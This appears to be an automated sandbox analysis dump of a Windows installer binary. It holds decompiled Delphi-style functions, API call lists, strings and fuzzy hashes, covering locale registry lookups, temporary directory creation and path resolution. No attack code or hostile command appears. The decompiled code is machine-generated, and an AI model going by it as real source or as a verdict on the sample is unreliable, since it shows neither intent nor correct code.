                                                            					_v12 = _t82 - _v1596.AllocationBase;
                                                            				}
                                                            				E0041A57C( &_v534, 0x104, E00420608() + 2);
                                                            				_t83 = 0x41f0bc;
                                                            				_t100 = 0x41f0bc;
                                                            				_t95 =  *0x414db8; // 0x414e10
                                                            				if(E00405F30(_t102, _t95) != 0) {
                                                            					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
                                                            					_t76 = E00407F04(_t83);
                                                            					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
                                                            						_t100 = 0x41f0c0;
                                                            					}
                                                            				}
                                                            				_t55 =  *0x4ba774; // 0x40e708
                                                            				_t18 = _t55 + 4; // 0xffec
                                                            				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
                                                            				E00405BE8( *_t102,  &_v1640);
                                                            				_v1636 = _v1640;
                                                            				_v1632 = 0x11;
                                                            				_v1628 =  &_v534;
                                                            				_v1624 = 0xa;
                                                            				_v1620 = _v12;
                                                            				_v1616 = 5;
                                                            				_v1612 = _t83;
                                                            				_v1608 = 0xa;
                                                            				_v1604 = _t100;
                                                            				_v1600 = 0xa;
                                                            				E0041A814(4,  &_v1636);
                                                            				E00407F04(_v8);
                                                            				_pop(_t98);
                                                            				 *[fs:eax] = _t98;
                                                            				_push(0x41f0af);
                                                            				return E00407A20( &_v1640);
                                                            			}

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                            • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                            • String ID:
                                                            • API String ID: 3990497365-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0040A6C8(signed short __eax, void* __edx) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				intOrPtr _v16;
                                                            				signed int _v20;
                                                            				short _v22;
                                                            				short _v24;
                                                            				char _v26;
                                                            				char _v32;
                                                            				void* __ebp;
                                                            				void* _t39;
                                                            				void* _t55;
                                                            				void* _t59;
                                                            				short* _t62;
                                                            				signed short _t66;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            				signed short _t79;
                                                            				void* _t81;
                                                            
                                                            				_t81 = __edx;
                                                            				_t66 = __eax;
                                                            				_v16 = 0;
                                                            				if(__eax !=  *0x4bdc08()) {
                                                            					_v16 = E0040A684( &_v8);
                                                            					_t79 = _t66;
                                                            					_v20 = 3;
                                                            					_t62 =  &_v26;
                                                            					do {
                                                            						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
                                                            						_t79 = (_t79 & 0x0000ffff) >> 4;
                                                            						_v20 = _v20 - 1;
                                                            						_t62 = _t62 - 2;
                                                            					} while (_v20 != 0xffffffff);
                                                            					_v24 = 0;
                                                            					_v22 = 0;
                                                            					 *0x4bdc04(4,  &_v32,  &_v20);
                                                            				}
                                                            				_t39 = E0040A684( &_v12);
                                                            				_t67 = _t39;
                                                            				if(_t67 != 0) {
                                                            					_t55 = _v12 - 2;
                                                            					if(_t55 >= 0) {
                                                            						_t59 = _t55 + 1;
                                                            						_v20 = 0;
                                                            						do {
                                                            							if( *((short*)(_t67 + _v20 * 2)) == 0) {
                                                            								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
                                                            							}
                                                            							_v20 = _v20 + 1;
                                                            							_t59 = _t59 - 1;
                                                            						} while (_t59 != 0);
                                                            					}
                                                            					E00408550(_t81, _t67);
                                                            					_t39 = E0040540C(_t67);
                                                            				}
                                                            				if(_v16 != 0) {
                                                            					 *0x4bdc04(0, 0,  &_v20);
                                                            					_t68 = E0040A684( &_v12);
                                                            					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
                                                            						 *0x4bdc04(8, _v16,  &_v20);
                                                            					}
                                                            					E0040540C(_t68);
                                                            					return E0040540C(_v16);
                                                            				}
                                                            				return _t39;
                                                            			}

                                                            APIs
                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Thread$LanguagesPreferred$Language
                                                            • String ID:
                                                            • API String ID: 2255706666-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00420BD8() {
                                                            				void* __ebx;
                                                            				struct HINSTANCE__* _t1;
                                                            				void* _t4;
                                                            
                                                            				_t1 = GetModuleHandleW(L"kernel32.dll");
                                                            				_t3 = _t1;
                                                            				if(_t1 != 0) {
                                                            					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
                                                            					 *0x4b7e30 = _t1;
                                                            				}
                                                            				if( *0x4b7e30 == 0) {
                                                            					 *0x4b7e30 = E0041A4DC;
                                                            					return E0041A4DC;
                                                            				}
                                                            				return _t1;
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                            • API String ID: 1646373207-1127948838
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
                                                            • GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
                                                            • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
                                                            • FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                            • API String ID: 2691416632-1888249752
                                                            • Opcode ID: 7eaf172969854dfabfe2384070bf8caee8e22896a72bba252f0bea0079ae3f0e
                                                            • Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
                                                            • Opcode Fuzzy Hash: 7eaf172969854dfabfe2384070bf8caee8e22896a72bba252f0bea0079ae3f0e
                                                            • Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                              • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                              • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                            • String ID:
                                                            • API String ID: 3216391948-0
                                                            • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                            • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                            • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                            • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
                                                            • GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorFileFindFirstLast
                                                            • String ID:
                                                            • API String ID: 873889042-0
                                                            • Opcode ID: 2c28104d048e73625ee3d3eed8fae21a8e15aade9eb95d70cdbdcf15955165a1
                                                            • Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
                                                            • Opcode Fuzzy Hash: 2c28104d048e73625ee3d3eed8fae21a8e15aade9eb95d70cdbdcf15955165a1
                                                            • Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                            • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                            • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                            • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                            • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                            • API String ID: 2701450724-3496071916
                                                            • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                            • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                            • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                            • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
                                                            • CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
                                                            • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                            • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                            • Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
                                                            • Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                            • Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID: P\l$p\l
                                                            • API String ID: 3997070919-2963016475
                                                            • Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                            • Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
                                                            • Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                            • Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
                                                            • API String ID: 1375471231-4222912607
                                                            • Opcode ID: e237758f4fd82c383e0ca560b4e3332f66906f72f2642b2f4657cc3014f73248
                                                            • Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
                                                            • Opcode Fuzzy Hash: e237758f4fd82c383e0ca560b4e3332f66906f72f2642b2f4657cc3014f73248
                                                            • Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006C4683
                                                            • SetWindowLongW.USER32 ref: 006C469F
                                                            • SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4
                                                              • Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                              • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                              • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                            • String ID: Loj$Setup
                                                            • API String ID: 1533765661-1180797960
                                                            • Opcode ID: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
                                                            • Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
                                                            • Opcode Fuzzy Hash: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
                                                            • Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                            • Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
                                                            • Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                            • Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                            • Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
                                                            • Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                            • Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                            • String ID:
                                                            • API String ID: 4025006896-0
                                                            • Opcode ID: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                            • Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
                                                            • Opcode Fuzzy Hash: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                            • Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLast$CountSleepTick
                                                            • String ID:
                                                            • API String ID: 2227064392-0
                                                            • Opcode ID: e92de128a85ff465f893565a8a936560ef2ccf8464eadd77d591fb41e4d7bbbe
                                                            • Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
                                                            • Opcode Fuzzy Hash: e92de128a85ff465f893565a8a936560ef2ccf8464eadd77d591fb41e4d7bbbe
                                                            • Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendNotifyMessageW.USER32(000302CC,00000496,00002711,-00000001), ref: 006AE618
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageNotifySend
                                                            • String ID: (\m$MS PGothic
                                                            • API String ID: 3556456075-219475269
                                                            • Opcode ID: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                            • Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
                                                            • Opcode Fuzzy Hash: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                            • Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: e93f63a39784aa6470c6da5dd94180a139e9ced73c7f02cb7c8ee81622348e6f
                                                            • Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
                                                            • Opcode Fuzzy Hash: e93f63a39784aa6470c6da5dd94180a139e9ced73c7f02cb7c8ee81622348e6f
                                                            • Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CountTick
                                                            • String ID: Failed to remove temporary directory: $bm
                                                            • API String ID: 536389180-2673898769
                                                            • Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                            • Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
                                                            • Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                            • Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                            • API String ID: 3535843008-1113070880
                                                            • Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
